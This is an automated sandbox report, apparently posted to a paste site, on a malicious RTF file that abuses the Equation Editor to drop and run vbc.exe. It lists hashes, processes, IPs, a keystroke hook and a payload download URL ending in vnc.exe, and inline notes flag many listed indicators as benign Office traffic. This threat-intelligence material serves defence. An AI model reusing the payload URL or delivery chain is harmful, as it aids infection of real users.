paladin316

1555RTF_67c092156ed5bdc811624ba6376a2bbb_doc_2019-09-11_13_30.txt

Sep 11th, 2019
  1.  
  2. * ID: 1555
  3. * MalFamily: "Obfsobjdat"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "RTF_67c092156ed5bdc811624ba6376a2bbb.doc"
  8. * File Size: 4403
  9. * File Type: "Rich Text Format data, version 1, unknown character set"
  10. * SHA256: "790666229814b82c78583a5adda3ef277a3f9eec30d90b2a78b56e269f89b0a9"
  11. * MD5: "67c092156ed5bdc811624ba6376a2bbb"
  12. * SHA1: "3638dd47abf04753bf4e39e676a9a59941fdcd20"
  13. * SHA512: "6d0cf3dfc9caca861462b5bc15465aabbcebea03aea3d4874e5a6a69df8740e19bf0caf40d20e18da832020dc696988666970979e09e0e86606ad5c080e57c13"
  14. * CRC32: "0ABE7945"
  15. * SSDEEP: "48:6+9ON2mffjJbkHiClr91mMDin4WfXTx1u6NGquCzeZfH0gAW1cXRqhPV+FmwpQ4t:pE6HXCIxW7+6M33qaqfdnrHNIZdO"
  16.  
  17. * Process Execution:
  18. "WINWORD.EXE",
  19. "svchost.exe",
  20. "EQNEDT32.EXE",
  21. "vbc.exe",
  22. "WmiPrvSE.exe",
  23. "explorer.exe",
  24. "WMIADAP.exe"
  25.  
  26.  
  27. * Executed Commands:
  28. "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
  29. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  30. "\"C:\\Users\\Public\\vbc.exe\"",
  31. "C:\\Users\\Public\\vbc.exe "
  32.  
  33.  
  34. * Signatures Detected:
  35.  
  36. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  37. "Details":
  38.  
  39.  
  40. "Description": "The RTF file contains embedded content",
  41. "Details":
  42.  
  43. "embedded content": "Object 2 index 00000033h contains embedded object eqUAtioN.3 with size 2126 bytes"
  44.  
  45.  
  46.  
  47.  
  48. "Description": "Attempts to connect to a dead IP:Port (10 unique times)",
  49. "Details":
  50.  
  51. "IP_ioc": "23.60.72.96:443"
  52.  
  53.  
  54. "IP_ioc": "40.91.122.234:443"
  55.  
  56.  
  57. "IP_ioc": "23.249.165.218:80 (United States)"
  58.  
  59.  
  60. "IP_ioc": "104.18.24.243:80"
  61.  
  62.  
  63. "IP_ioc": "104.75.172.25:443"
  64.  
  65.  
  66. "IP_ioc": "184.28.188.178:80"
  67.  
  68.  
  69. "IP_ioc": "184.28.188.193:80"
  70.  
  71.  
  72. "IP_ioc": "72.21.91.29:80"
  73.  
  74.  
  75. "IP_ioc": "104.119.18.125:443"
  76.  
  77.  
  78. "IP_ioc": "52.109.2.14:443"
  79.  
  80.  
  81.  
  82.  
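  83. "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
      (Analyst note: the names listed below appear to be Microsoft Office bibliography-style (.xsl), SmartArt layout (.glox) and theme (.thmx) files, several with their leading characters cut off, e.g. "ontent.inf" next to "content.inf". They look like artefacts of Word loading its own templates and should be confirmed before being used as indicators for this sample.)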
  84. "Details":
  85.  
  86. "ioc": "gb.xsl"
  87.  
  88.  
  89. "ioc": "ontent.inf"
  90.  
  91.  
  92. "ioc": "adial.glox"
  93.  
  94.  
  95. "ioc": "ist.glox"
  96.  
  97.  
  98. "ioc": "chicago.xsl"
  99.  
  100.  
  101. "ioc": "iso690nmerical.xsl"
  102.  
  103.  
  104. "ioc": "turabian.xsl"
  105.  
  106.  
  107. "ioc": "harvardanglia2008officeonline.xsl"
  108.  
  109.  
  110. "ioc": "chevronaccent.glox"
  111.  
  112.  
  113. "ioc": "gostname.xsl"
  114.  
  115.  
  116. "ioc": "ieee2006officeonline.xsl"
  117.  
  118.  
  119. "ioc": "e.gu"
  120.  
  121.  
  122. "ioc": "rocess.glox"
  123.  
  124.  
  125. "ioc": "rame.glox"
  126.  
  127.  
  128. "ioc": "sist02.xsl"
  129.  
  130.  
  131. "ioc": "iso690.xsl"
  132.  
  133.  
  134. "ioc": "rc.glox"
  135.  
  136.  
  137. "ioc": "mlaseventheditionofficeonline.xsl"
  138.  
  139.  
  140. "ioc": "anded.thmx"
  141.  
  142.  
  143. "ioc": "content.inf"
  144.  
  145.  
  146. "ioc": "architecture.glox"
  147.  
  148.  
  149.  
  150.  
  151. "Description": "Performs some HTTP requests",
  152. "Details":
  153.  
  154. "url_iocs": "http://qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com/big/vnc.exe"
  155.  
  156.  
  157.  
  158.  
  159. "Description": "The RTF file has an unknown character set",
  160. "Details":
  161.  
  162.  
  163. "Description": "Sniffs keystrokes",
  164. "Details":
  165.  
  166. "SetWindowsHookExW": "Process: explorer.exe(2044)"
  167.  
  168.  
  169.  
  170.  
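  171. "Description": "A document file initiated network communications indicative of a potential exploit or payload download",
       (Analyst note: most "http_request" values listed under this signature are not HTTP. Those beginning \x16\x03\x01 or \x17\x03\x01 are TLS records (handshake and application data, record version 0x0301) sent by WINWORD.EXE, and the server names readable in them (roaming.officeapps.live.com, odc.officeapps.live.com, templateservice.office.com, omextemplates.content.office.net) are Microsoft Office services. The plaintext GET with a visible Host header goes to ocsp.digicert.com, a certificate-status responder. None of the entries visible here shows the payload download itself; that URL is the one reported under "Performs some HTTP requests".)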
  172. "Details":
  173.  
  174. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00~\\x01\\x00\\x00z\\x03\\x01x\\xee*\\x0f\\x8c8\\x17nj~gt\\x18\\x1f\\x98\\x8a\\xe7)\\xc6\\x04\\xa4a\\x1a\\xb8k\\xa4\\xc5s<\\x0c\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x009\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00 \\x00\\x1e\\x00\\x00\\x1broaming.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  175.  
  176.  
  177. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x8b\\xb1\\xbe\\xa3\\xe1z\\x87\\x07 e\\x90n\\xf2bpprk\\x19\\xda\\x01*\\xe9\\xd9\\xd6v\\x06j\\xcbv\\x04,\\xf9\\xfd\\xcc\\xbe\\x88\\xb13\\xac\\x15\\xbf\\xaf\\xda\\xfb\\xe2.\\xd2x(\\x9d=\\x8e\\xc2\\xa7\\x0c,^\\xb5c\\xcfd\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\n\\xa3>9o\\x1cn'fm%\\xe1\\xe5\\x10#n7\\xfb\\xfa\\xc3#i\\x85\\x16\\x8dd\\x1es\\xb9\\xd4\\xe4\\x9c\\xb0\\xfd\\x84\\\\xe2j\\x19\\x83j\\xb1%\\xd5\\xd6g\t"
  178.  
  179.  
  180. "http_request": "winword.exe_WSASend_get /mfewtzbnmeswstajbgurdgmcgguabbtbl0v27rvz7lbduom%2fnyb45spuewqu5z1zmijhwmys%2bghunoz7oruetfaceai4elabvpzalrznpjlrv1u%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: ocsp.digicert.com\r\n\r\n"
  181.  
  182.  
  183. "http_request": "winword.exe_WSASend_get /mfqwujbqme4wtdajbgurdgmcgguabbrpc1vzt9qvn7bzy3iidtbhla4mkqquwiif1tycsck3fd7%2fhijo5ox%2f%2bn0ce3saagyvv14%2fmepdgh0aaaaabk8%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: sat, 23 mar 2019 17:46:18 gmt\r\nif-none-match: \"dd54d75d468"
  184.  
  185.  
  186. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\x15p\\x8c\\x03\\x00\\xe6a\\xe0\\x08\\xad\\xdd\\x0ed\\xe8\\xb0\\xf1\\x92^\\xe8\\x94d\\xba$\\xef\\xf1\\xae-9\\x8b\\x93)\\xae \\x8f\\xb9\\xb8\\x87\\xd9\\xf6\\xe16\\x965\\xa4\\xfbs\\xd0p\\xf5\\xec\\xeb\\x08\\xd7\\xe1\\xb7m-\\xee\\xafxav\\xb4*k\\x80\\x7f\\xbb\\x89s\ra\\x9a\\xa7x\\xa3wtr\\xbe\\x83\\xaeg\\xee\\x1d\\x83\\xa1\\xb8=#\\xbb1`\\x0bb\\xbc@ru\\x8bv\\xbd\\xc9\\xbdr4\\xbf\\xca\\x07\\xe2\\x17t\\xc6\\x02c\\xc7\\xba4jh|\ns\\xcc\\xf1\\xf3m/\\x81cd\\xf4\\xde\\xc2\\xd1\\xc8\r\\xcc\\xce.u\\x10\\x16\\x00\\xb9\\x9d\\x97\t\\xd4\\x8bl\\xcbk\\xca\\xd2&r\\xe1\\x94\\xea\\xdf\\xaf\\xc7\\xe4c\\xdf<\\xa1\\xef\\xf9w\\xdf\n\\x00e\\xed\\0\\xb6\\xc3\\xcc\\x1f\\xf19@@\\xf7\\xaa\\xa8\\x12\\xd1\\x17\\x94m\\x0e',$\\xcf5\\x9e\\x9a\\xa9\\xea%\\xee\\e\\xbe\\xc9b\\xff\r$\\xd7\\x87u\\xa8\\xc5\\xb9\\xd6fd\\x91\\x8c\\xf9e\\x03\\x16w\\xecq\\xd7\\xf8\\xcb\\x96\\xb5i\\xae\\xba\\xe7\\x8b\\x02\\x06^\\xe0\\x97"
  187.  
  188.  
  189. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x02 \\xa2w\\xf3+\\x84\\xea\\x83z\\x8a\\x04\\x02=0`\\xe3\\x18\\xb4p\"5j\\x98x\\x8c\\x8f\\xf4\\xd0\\xbdpc\\xc7\\xad\\x17\\x18w\\xf1\\xb1\\xc1o\\x95\\x95\\xbf.,\\x91#\\xeb\\xf9\\x99\\x05\\x9f\\xed\\xcd\\x16#\\x0b\\xc545\\x90\\x1e\\x17\\xaf\\xb8\\xb7e\\x18\\x14%\\xc6\\xfa^u\\xa1wbi\\xca\\x1f\\xcdp\\xe3>\\xec3\\xb3~(\\x9df\\x89\\xc5#k\\xa8\\x84:\\xab^\\x91\\xd4mv\\xba/\\x8a \\xcc\\xc2\\xfb#p3h\\x8b\\x9c5$f\\x89\\xaa\\x8dp^b\\x8a\\x9b\\xe5\\x04\\xd3`\\xa8\\xf1\\xadf\\x89\\xa3\\xbb\\xd6\\x92q\\xc9\\x1e\\xacb`\\x11\\x9a\\x04\\\\xe8|c<\\xfbv\\xff\\xc5\\x0b\\xf5\\xe5\\x12\\xf8g\\x0cn\\x00q\\xa6_\\xb2\\x1b\\xfb\\x1e\\xcd\\x0b\\xb8\\xa1\\x13\\x18\\xc4\\xa4h,\\xad\\x11\\xcb\\xa1\\x80\\x8c(\\x9dz\\xc4\\xa6\\xf6\\x16e\\x04\\xd6\\xbda\\x08\\x99\\x7f\\xb1\\xa4'\\xbeu&i\\x13~#`\\xe4\\x97\\xee\\x12\\xec*m\\xf7^\\x16\\x9d/\\x91a\\x95\\xe0\\xb3\\x7fe\\x05|g\\xe5\\xa8\\xe7^\\x1e\\xf6vch\\x9e"
  190.  
  191.  
  192. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00z\\x01\\x00\\x00v\\x03\\x01x\\xee/\\xd0\n\\x7f\\x8fr7\\xf8c\\x012\\xc4\\x9b\\xe4\\xf74\\x01\\xb2\\xfd\\xee\\x12\\xea\\xb1r\\xff&s\\xedd\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x005\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1c\\x00\\x1a\\x00\\x00\\x17odc.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  193.  
  194.  
  195. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04&\\x9f\\xda\\x7f\\\\x8d'3\\xa6\\x14\\x8d\\xeb<\\xec\\x91\\x90\\x91\\x12\\x11\\xc9$\\xcb\\x18$\\xc9\\xf0\\xe0\\xd8/w\\x15\\xf6v \\xd9r\\xfb\\x12\\xc0\\xe5\\xe3z\\xc0\\x88\\xd7.\\xd8\\x1e0dj\\xb7h\\xa0\\xa9\\xd6\\xd3\\x03\\x11\\xc8\\xfe\\xe0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000od\\xdfn\\xbc\\x12\\xb3k@;\\xd2 j\\xd1\\xc6\\xa00&haw\\x82\\x00\\xbc\\x92\\x87y\\xd0h\\xa1\\xd47\\x0fs\\x98l\\x9e\\x83t\\xd5r&k\\xb6\\xbd\\x9c\\xeb"
  196.  
  197.  
  198. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\x83\\x1cw\\x1bh\\x00\\x85s\\xd6\\xeb\\xabq\\xd8\\xb29\\x0e\\x8a\\x87u\\xb3*\\xc3\\xa9\\xaa\\xa9\\xbeai\\xdbey\\xe3\\xe4\\xa8\\xa1\\xe1\\x7f\\xffg\\xb9\\x84af\\xfa\\x11't\\xbcy\\x9d&j\\x98\\xe4w\\xf9\\x16\\xbf_\\xf5*\\x85n\\x177\\x10\\x82\\xc6&\\\\xe9\\x8e\\x88\\xaa,\\xc5x\\xcfs/\\xef\\xfe\\x06\\xef\\xc3\\xc6,r's\\xdd\\xfdt\\xcc\\xaa\\x9fb*xwg\\xf7\\xe6\\xf1\\xed\\xc3\\x84zr@\\xf3\\xca\\xe4\\xb7)\\xb8\\x8a$ux\\x81\\xfal\\x8d6\\x0ff>\\xcd\\x81\\xa0;\\x98\\x11\\x7f\\xc6\\xa5\\xb3\\x99&\\xc6\\xd2\\xa4\\xbf\\xcfm\\xab\\xf8\\xc5ary\\xf7\\x0c\\xa17\\x8b\\xa4\\xa9\\x84m\\xea\\xd4j\\xfd\\xb9\\xda\\x98\\x1e\\x85\\x11g\\xb9\\xb5/k\\xca\\xd7\\x01\\x91\\x80\\x0c\\x94c\\xd3\\xf9+\\xca\\x8e\\x85\\xb5/\\xd9\\xee\\x8c\\xfax\\x89i=#\\x08\\xfc\\x04\\xb9\t#\\xed\\x93\\x9bf\\xe66\\x8e\\xc4\\xe1l3\\x1bk\\x0ft\\xf3\\xcc\\xa2\\x1e\\xa5ye\n|\r\\x18'\\x04amz\\x10f\\x86o\\xfa\\xe9\\xb3-\\xfa\\x0c"
  199.  
  200.  
  201. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x01\\x00\\x00y\\x03\\x01x\\xee4\\xce\\xe9\\\\xb1\\x06n\\xe1\\x8f\\x8ccy8\n\\xea\\xc0nq\\xf1\\xf2\\x10*v\\xee\\x12k\\xaa.\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x008\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1f\\x00\\x1d\\x00\\x00\\x1atemplateservice.office.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  202.  
  203.  
  204. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf6>\\xbd\\xe0h\\x8d+fle\\xe9\\x85\\x81n\\x1e\\xc7\\xa5!\\x16\\x12\\xeb\\x91\\x0f\\x1a2\\\\x8ej9\\xa9\\xde\\xc9\\xf7\\xef!\\xb6\\xbdu\\x15\\xb9\\xab\\x07\\xfa\\xd3p\\x18\\x13jq\\x88\\xd0=d\\xfduu\\x89\\x97\\x9a\\xc5\\xee\\xc6 \\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000r\\xb4qf\\xf7\\x18\\x91\\x85\\x17\\x07\\x9e\\x89\\x05\\xf6io+\\xa2@\\x86f\\xc6\\x95\\xf8\\x93\\x9f\\xa3xcu\\xa9x)\\xeb'\\xcc\\xd7?\\xdf\\xd7\\x01\\xa1\\xac\\xa9p\\x06\\x18\\xe4"
  205.  
  206.  
  207. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xbf\\x8f\\xed`\\x9e1\\xb3\\xebo\\xd3\\xcc\\xf0'\\xce\\xd8\\x9c5\\x07\\x16\\xd1\\xcc\\x08\\x19\\\\x9fo\\xed\\x9c&\\xe5\\x17\\xde\"\\x18\\xb1\rj\\xeb\\x0c\\xdc\\xc9\\xe7\\x07\\xd3\\xab\\x9cf8,\\xcc\\xb1\\x9e\\x9f\\xb0\\xdd\\x92\\xaaq\\xf1\\xd0n\\x05\\x81e\\xeb\\xc7\\xd1 \\x8e\\x11n7\\xdb\\x08\\x16\\xa6\\x01\\xf5\\xe1\\xd6\\x1d\\xbd\\x9cq\\xb4\\x00u\\xd4\\x87\\xc9|\\x04\\xd1\\xacx0gh\\xaa\\x1b\\xc0\\xe8z\\x8a\\xb4\\xed\\x02\\x1f\\xdc_%+$\\x08\\x01bh\\xf7\\xf7g\\xd2\\xbc\\xe2\\xe4|\\x8d\\x8e\\xd5'*\\x1f\\x01\\x14\\xb1\\x1c\\x9d\\x1aa\\xf0\\x0ey\\xc6\\xb8^\\x02\\xbd6\\x17v\\xf8\\x9f\\x9e\\x8ey\\x99\\xda\\xed\\xe1\\xfd\\x1a\\xd5\\x16=\\xc4d\\xbc\\x1e\\xbbs\\x04\\xb3b\\xe5u\\xb2\\x8a\\xa0&\\xc5u\\xc78\\xc5xy\\x81\\xb8\\xa8\\x9f\\x84\\xbcz#d\\xdf\\x9fh\\xebv\\xda\\x10)\\x80?~\\x9c\\xcd)3\\x85\\x16\\xeb\\x8b\\x03r\\-q\\xe1ub\\x06\\x82\\x18\\x9eq0\\xe9y\\x9e\\x07c\\x1bdim\\xd6\\x08y\\xf1\\xbd\\xb5jn\\xc5s\\xdf\\x16"
  208.  
  209.  
  210. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xfc\\x13\\x8e&\\xa0\\xaf\\xe8\\xb4\\xd5\\xeco9\\x80u\\x01y\\xfe\\x85~\\x85\\xc7\\x95i%\\x16va\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  211.  
  212.  
  213. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xcf\\xbf\\xe9e`a\\x94w\\xb5\\x858t\\xa2\\xdc\\xd4d\\x88>\\xe3tc\\xed\\xe0pv\\xa5\\xb0\\x99\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  214.  
  215.  
  216. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5(\t\\x81&+\\xc4\\x10w\\xfe\\xc5\\x94\\xbe=g\\x9co\\xc8j\\x15?\\xbf\\xf7\\xd0\\x990\\xc8\\x89\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  217.  
  218.  
  219. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xf1m\\xf2=\\xf9\\x95)f0\\x8c\\x16\\xbf\\xc2\\x0f\\xdc`\\xad\\x01\\x83\\x16\\xa9)\\xf3n\\x8eke\\xf5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  220.  
  221.  
  222. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xc4\\x8b\\xc6\\x8b\\xac\\x7f\\x19j\\xfa\\x01\\x11\\x06\\x0c\"r\\xdc\\x0e\\xbfl\\xca/$\\xa4\\x00\\xde\\xf3\\xfd\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  223.  
  224.  
  225. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5t1\\xb1\\x08\r\\xd7\\x19d\\x8f#\\xab\\x9d\\xdc\\x81\\xf3\\xa5\\x06r$a\\xe2\\xdf9\\x8b4o\\x85\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  226.  
  227.  
  228. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xcb1\\x93\\xc8d$\\x19\\x95\\xe8\\xae\\x0e\\xf4p\t\\xca\\x1c\\x06\\x17c8\\x1c4\\xe1+\\xe0\\xc4\\x95\\xdc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  229.  
  230.  
  231. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5h6\\x8alg\\xda\\x91\\xb6\\xfdqg\\xfa@\\x1e\\x85\\x9dj\\x18(zk\\x97\\xfd.!\\x9a\\xf0\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  232.  
  233.  
  234. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5?\\xcf\\x97\\xaf\\xb9+0n\\x88\\x10\\x03\\xc7\\x06\\xaaj\\xdb\\x8b\\xa7cu\\xfd\\xf0\\x9b\\x89\\xe7s\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  235.  
  236.  
  237. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee54\\x08!\\xb2\\xa3\\xfdf\\x9f\\x9b/\\x04\\xde\\xc4\\x07\\xe0w\\xcf\\x97\\x10=r\\x9e'\\x0b\\x0b\\x1a\\x922\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  238.  
  239.  
  240. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x0f\\x95\\xb35=\\x96\\xabay\\xd2\\xb8r&v\\xd4<\\x9e\\xe5\\x9e\\xab\\xd5$\\x06(\\x95\\xb5\\xe3\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  241.  
  242.  
  243. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee56\\x0c\\xd1m*\\xf9\\x97\\xe1\\x0ed\\xb9\\xfd\\xb5\\xf0e\\xd2\\xa5\\xd5io(\\x16\\x98\\x1b\\xfcd\\xf6h\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  244.  
  245.  
  246. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x00\\xfe\\xb7\\xf3;$6sg\\x95\\x17\\x1d\\xdf\\xd1\\x83q#\\xc4\\x99\\xc6\\x1a\n\\x85\\x93,r\\xc5)\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  247.  
  248.  
  249. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xfc'%s\\x053\\x92s\\xba\\x90\\x0f\\xd7\\xed\\xee\\x92\\xfe\\x07r,\\xce\\x9a\\xc7nm\\x91k\\xd2x\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  250.  
  251.  
